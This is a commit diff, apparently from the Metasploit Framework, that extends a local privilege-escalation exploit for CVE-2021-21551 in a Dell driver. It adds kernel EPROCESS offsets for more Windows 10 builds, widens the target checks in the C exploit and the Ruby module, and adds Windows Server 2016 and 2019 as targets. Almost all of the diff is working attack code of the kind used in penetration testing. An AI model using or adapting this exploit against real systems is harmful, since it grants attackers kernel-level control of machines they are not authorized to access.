Add and test even more targets

2021-05-13 17:27:58 -04:00 · 2021-05-13 17:27:58 -04:00 · d990e884af
parent eb89550f85
commit d990e884af
5 changed files with 21 additions and 3 deletions
--- a/data/exploits/CVE-2021-21551/CVE-2021-21551.x64.dll
+++ b/data/exploits/CVE-2021-21551/CVE-2021-21551.x64.dll
--- a/documentation/modules/exploit/windows/local/cve_2021_21551_dbutil_memmove.md
+++ b/documentation/modules/exploit/windows/local/cve_2021_21551_dbutil_memmove.md
@ -7,7 +7,9 @@ read and write kernel-mode memory.
 * Windows 7 SP0 x64
 * Windows 7 SP1 x64
 * Windows 8.1 x64
-* Windows 10 x64 v1803 - 20H2
+* Windows 10 x64 v1607 - v2009 (20H2)
+* Windows Server 2016 x64
+* Windows Server 2019 x64

 ## Verification Steps

--- a/external/source/exploits/CVE-2021-21551/exploit.c
+++ b/external/source/exploits/CVE-2021-21551/exploit.c
@ -45,6 +45,15 @@ BOOL ResolveRequirements(void) {
 	else if ((dwMajor == 6) && (dwMinor == 3) && (dwBuild == 9600)) {
 		g_pEprocessOffsets = &EprocessOffsetsWin8p1;
 	}
+	else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 14393)) {
+		g_pEprocessOffsets = &EprocessOffsetsWin10v1607;
+	}
+	else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 15063)) {
+		g_pEprocessOffsets = &EprocessOffsetsWin10v1703;
+	}
+	else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 16299)) {
+		g_pEprocessOffsets = &EprocessOffsetsWin10v1709;
+	}
 	else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 17134)) {
 		g_pEprocessOffsets = &EprocessOffsetsWin10v1803;
 	}
--- a/external/source/include/windows/common.h
+++ b/external/source/include/windows/common.h
@ -43,6 +43,12 @@ const static EPROCESS_OFFSETS EprocessOffsetsWin7Sp0 = { 0x188, 0x208, 0x180 };
 const static EPROCESS_OFFSETS EprocessOffsetsWin7Sp1 = { 0x188, 0x208, 0x180 };
 /* Windows 8.1 (6.3.9600) - https://www.vergiliusproject.com/kernels/x64/Windows%208.1%20%7C%202012R2/Update%201/_EPROCESS */
 const static EPROCESS_OFFSETS EprocessOffsetsWin8p1 = { 0x2e8, 0x348, 0x2e0 };
+/* Windows 10 v1607 (10.0.14393) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1607%20Redstone%201%20(Anniversary%20Update)/_EPROCESS */
+const static EPROCESS_OFFSETS EprocessOffsetsWin10v1607 = { 0x2f0, 0x358, 0x2e8 };
+/* Windows 10 v1703 (10.0.15063) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1703%20Redstone%202%20(Creators%20Update)/_EPROCESS */
+const static EPROCESS_OFFSETS EprocessOffsetsWin10v1703 = { 0x2e8, 0x358, 0x2e0 };
+/* Windows 10 v1709 (10.0.16299) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1709%20Redstone%203%20(Fall%20Creators%20Update */
+const static EPROCESS_OFFSETS EprocessOffsetsWin10v1709 = { 0x2e8, 0x358, 0x2e0 };
 /* Windows 10 v1803 (10.0.17134) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1803%20Redstone%204%20(Spring%20Creators%20Update)/_EPROCESS*/
 const static EPROCESS_OFFSETS EprocessOffsetsWin10v1803 = { 0x2e8, 0x358, 0x2e0 };
 /* Windows 10 v1809 (10.0.17763) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1809%20Redstone%205%20(October%20Update)/_EPROCESS */
--- a/modules/exploits/windows/local/cve_2021_21551_dbutil_memmove.rb
+++ b/modules/exploits/windows/local/cve_2021_21551_dbutil_memmove.rb
@ -82,12 +82,13 @@ class MetasploitModule < Msf::Exploit::Local
  def target_compatible?
    sysinfo_value = sysinfo['OS']

-    build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i
+    build_num = sysinfo_value.match(/Build (\d+)/)[1].to_i
    vprint_status("Windows Build Number = #{build_num}")

    return true if sysinfo_value =~ /Windows 7/ && ((build_num == 7600) || (build_num == 7601))
    return true if sysinfo_value =~ /Windows 8\.1/ && (build_num == 9600)
-    return true if sysinfo_value =~ /Windows 10/ && (build_num >= 17134 && build_num <= 19042)
+    return true if sysinfo_value =~ /Windows 10/ && (build_num >= 14393 && build_num <= 19042)
+    return true if sysinfo_value =~ /Windows 2016/ && (build_num >= 14393 && build_num <= 19042)

    false
  end